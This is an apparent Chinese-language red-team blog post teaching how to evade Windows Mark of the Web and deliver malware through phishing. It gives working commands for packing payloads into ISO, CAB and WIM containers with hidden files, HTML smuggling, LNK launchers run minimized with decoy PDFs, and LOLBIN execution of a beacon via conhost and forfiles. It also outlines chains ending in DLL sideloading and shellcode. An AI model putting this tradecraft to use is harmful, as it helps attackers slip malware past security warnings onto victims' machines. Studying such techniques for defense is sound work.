# windows
微软在2022年7月为了帮助用户保持安全,在Office中默认阻止了internet宏。
阻止从Internet下载的文档中的VBA宏。
接下来我们来了解一下MOTW标记,其实就是网络标记。
什么是MOTW标记?
MOTW全名Mark of the Web,他是windows操作系统中的一个安全特性,为了帮助用户在处理下载文件时提供更多的安全保障设计的。
MOTW标记是一种XML注释,可以将其添加到文件的头部,以指示该文件是从internet上下载的,这个标记告诉Windows操作系统,该文件来自互联网,并提醒用户在打开文件时要小心。例如,当用户双击打开一个包含MOTW标记的文件时,Windows会显示一个警告,提醒用户该文件可能不安全,并询问用户是否确实要打开它。
MOTW标记的目的是增强安全性,帮助用户警惕可能包含潜在风险的文件。这对于防止恶意软件传播和保护系统安全非常有用。
所以一般如果我们互联网上下载的文件有可能会被打上这个标记,例如显示这个文件来自另一台计算机,Unbland可能会被阻止以帮助保护他的计算机。
那么我们如何去逃避呢?
逃避MOTW标记
针对于逃避MOTW标记,我们可以使用某些容器来搭载我们从互联网上下载的恶意软件,有些容器他不会MOTW标记传播到内部文件。
使用镜像文件进行逃避,例如ISO文件,IMG文件,DMP文件。
也可以使用CAB文件,CAB 文件是一种 Microsoft Windows 上常见的存档文件格式。
CAB 文件通常用于将一组文件打包成单个文件,以便于在 Windows 系统中进行分发、安装或存档。这种格式在安装 Windows 软件、更新、驱动程序等方面非常常见。CAB 文件通常可以通过 Windows 的内置工具或者第三方解压软件进行解压缩。
我们可以使用windows自带的工具来进行压缩文件,首先需要创建一个txt文件,里面要写你自己要压缩的文件路径。
然后使用makecab来进行压缩。
makecab /F .\cab.txt
如上图就压缩好了,然后我们就可以直接双击进行解压。
也可以通过WMI文件格式来作为容器,WIM文件是一种 Windows 映像文件格式,用于捕捉、存储和部署 Windows 操作系统的映像。WIM 文件通常用于 Windows 安装介质和部署工具(如 Windows 部署服务、MDT 等)中。
如果我们先将文件压缩成WIM文件的话,我们可以使用Windows自带的工具Dism.exe。
也可以通过7zip直接压缩。
现在让我们来手动压缩一下:
Dism /Capture-Image /ImageFile:C:\Users\Administrator\Downloads\relaysec.wim /CaptureDir:C:\Users\Administrator\Downloads /Name:"relaysec" /Description:"Files to deploy"
这里简单来解释一下这几个参数:
/ImageFile: 指定输出的 WIM 文件名
/CaptureDir: 指定要捕捉为映像的文件夹
/Name: 指定映像的名称
/Description: 关于影响的描述
如下图成功创建:
创建的wim文件就是ImageFile指定的路径。
尝试解压:
可以看到压缩包中的文件。
复杂感染链
这里其实指的是钓鱼链,例如我们之前说到过的zip->lnk->白程序->黑dll->shellcode。
所以只是一组链接文件,这些文件将被很好的链接在一块,从而导致被感染。
如下例子:
我们可以通过发送邮件的方式里面嵌入链接,或者在PDF中嵌入链接,需要注意的是这里嵌入的链接是HTML走私的页面,目标访问HTML走私页面获取到ISO恶意文件载体,然后通过ISO解压,通过lnk去执行我们的木马。
如下链:
email ⏩ HTML走私 ⏩ lnk ⏩ dll ⏩ shellcode
那么也就是说无论是HTML走私还是说SVG走私都是可以的。
接下来我们可以尝试使用webdav去钓鱼,这种方式其实公众号是发过的。
参考如下:
https://mp.weixin.qq.com/s/q4MyZKF8ed_WSz_PF2NCRg
针对于容器载体的话,一般我们会选择ISO/IMG文件,因为可以包含我们隐藏的文件,或者ZIP文件以及wim文件都是可以的,这些我们上面介绍过。
恶意文件触发
针对于恶意文件触发,我们有很多种方式,例如lnk文件,或chm文件。一般lnk文件会去运行cmd或者powershell或exe文件。
那么对于chm文件来说就比较笨重了,而且查杀会相对严重一点。
有些文件既可以充当恶意载体也可以进行恶意文件触发。
例如MSI文件,在安装的过程中触发恶意文件或执行相关命令。
包括我们前面所说的ClickOnce也可以进行远程加载恶意文件。 只是需要注意INSTALL=TRUE。
Payload
针对于payload有几种方式:
-
白加黑的方式,就是白程序加黑dll的方式。 -
直接或间接去加载dll,例如rundll32.exe shell32.dll,函数 evil.cpl -
MSI文件 -
MSI + .MST文件 -
ClickOnce -
宏文档 -
html走私->ISO->autoit3.exe -> .au3 + pdf
接下来我们尝试使用第七种触发链。
这里的.au3脚本非常简单。
就是一个弹窗的代码。
然后我们尝试使用autoit64.exe去执行即可。
现在我们需要将其写到lnk文件中。
C:\Windows\System32\cmd.exe /c au.exe msgbox.au3
这里有一个简单的技巧,一般我们直接使用cmd.exe /c去调用的时候会有一个黑窗口,这里我们可以将运行方式改为最小化,就没有了。
这里我们可以选一下图标。
还是我们之前所说的。
因为我这里虚拟机没有装pdf解析器,所以这里使用计算器代替。
接下来我们就需要将这三个文件打成ISO文件了。
python PackMyPayload.py c:\Users\Administrator\Desktop\payload c:\Users\Administrator\Desktop\payload.iso --hide au.exe,msgbox.au3
获取到ISO文件之后。
我们需要来进行HTML走私。
python smuggler.py c:\Users\Administrator\Desktop\payload.iso c:\Users\Administrator\Desktop\payload.html -M
然后尝试打开html文件。
一般我们会将html文件放置到我们的机器上来做。
这里为了方便就直接打开了。
下载之后就可以直接打开了。
可以看到这里只会显示这一个文件。
成功执行
一般我们在执行我们的恶意文件的之后也要去执行正常的文件,这样比较合理一点。
这里其实就可以使用到 | 这个符合,也就是或的意思。
例如:
C:\Windows\System32\cmd.exe /c au.exe msgbox.au3 | report.pdf
还有一点需要注意的是,尽量不要使用cmd去运行你的恶意软件,尽量采用LOLBIN的方式。
conhost --headless forfiles.exe /p c:\windows\system32 /m user32.dll /c "<hex-encoded-cmd /c>" /c beacon.exe | report.pdf
conhost --headless forfiles.exe /p c:\windows\system32 /m user32.dll /c "<hex-encoded-cmd /c>" /c report.pdf| beacon.exe
我们可以来看看如上命令使用到的进程链:
可以看到这里其实跑的是conhost.exe。
一般我们会去做一个白加黑的方式去加载:
HTML走私 ⏩ ISO ⏩ lnk ⏩ 白程序 ⏩ 黑dll ⏩ shellcode
原创 relaysec Relay学安全
